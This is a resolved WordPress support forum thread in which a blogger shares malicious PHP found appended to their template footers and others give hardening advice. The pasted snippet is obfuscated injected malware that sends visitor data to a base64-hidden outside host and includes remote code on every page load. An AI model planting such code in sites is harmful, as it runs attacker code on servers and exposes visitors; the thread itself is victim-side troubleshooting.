WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Security Problem (9 posts)

  1. angelbloom
    Member
    Posted 8 years ago #

    I recently had a security problem on my blog(s), http://www.fractured-beauty.net. I'm not exactly sure what happened, but I visited my blog and I was bombarded by a number of popups, advertisements, and even viruses.

    I looked around on my blog and I saw that some of my codes had been edited, mainly the sidebar, which had unfamiliar codes on it, and my footer. I fixed the problem, but went back through all of my templates and found this unfamiliar code at the bottom of almost all of my pages.

    The code SHOULD be:


    <?php get_footer();?>

    but was this instead


    <?php get_footer(); $z=ini_get('error_reporting');error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);} error_reporting($z);?>

    Was this just some hacker out to get me? or was it something i neglected to do security-wise with my wordpress installation?

    note: i had NEVER given my password to anyone. nobody knows it but me, and nobody else uses my computer.

  2. moshu
    Member
    Posted 8 years ago #

    Recently there was a similar report: http://wordpress.org/support/topic/49693 but as it turned out it was a bad script installed by the user, not WP>
    Did you install anything lately to your blog? A small counter... or anything?

  3. angelbloom
    Member
    Posted 8 years ago #

    this happened to two of my blogs. they have nothing in common, really, no plugins that match, no counters, etc. i have counters on my first blog that have been there for about two years, so i doubt that it what is causing it.

    my other blog, on the other hand, has no plugins, no stats, no nothing, and also had the exact same problem.

  4. whooami
    Member
    Posted 8 years ago #

    angelbloom,

    a quick google of some of what you pasted indicates that that is NOT related to any plugin you have installed.. and a look at the other post shows even the casual observer that what they pasted does not resemble what you pasted. You have dirs other than your image directory that are world writable (777)? If so, i reccommend changing those permissions asap.

    there is base64 decoder available on the net at http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx for anyone that comes across what seems like uninteligible strings such as these..

  5. angelbloom
    Member
    Posted 8 years ago #

    thanks a lot! I'll try it. from last night, when i removed those tags, my blog has been really quiet. i changed the permissions to 666 instead. it seemed that this post had the exact same problem i did:

    http://wordpress.org/support/topic/44318#post-276216

    and they were suggested the same thing. thanks a lot, we'll see if it works.

  6. whooami
    Member
    Posted 8 years ago #

    thats not the same problem (on the surface) The script they pasted is java encoded, not base64. Though it may very well be the same thing its not immediately identifiable as being so.

    Regardless of that, Im happy that you didnt assume it was a plugin, and let it go. I checked your site and you are going to need to make the upgrade to 1.5.2, as you appear to be using 1.5 still. Updates might be time consuming in the here and now, but when they address security issues can save a lot more heartache down the road.

    aditionally, if you have anything using php on your site other than what you already indicated, chances are that same code is somewhere within that, as well.

  7. angelbloom
    Member
    Posted 8 years ago #

    anybody know where it could be coming from? is it being automatically generated or did someone like...do it? lol

  8. whooami
    Member
    Posted 8 years ago #

    someone, like, did it. world writable dirs (777) are an absolute no-no.word-writable files are worse.

    And like I have already said, it is a MUST that you keep current on updates. Thats a responsibilty that comes with running ANY software application, be it remote or locally.

  9. angelbloom
    Member
    Posted 8 years ago #

    thanks. i have updated to 1.5.2 because of the problems that i got. thanks a lot for the help whooami ^^

Topic Closed

This topic has been closed to new replies.

About this Topic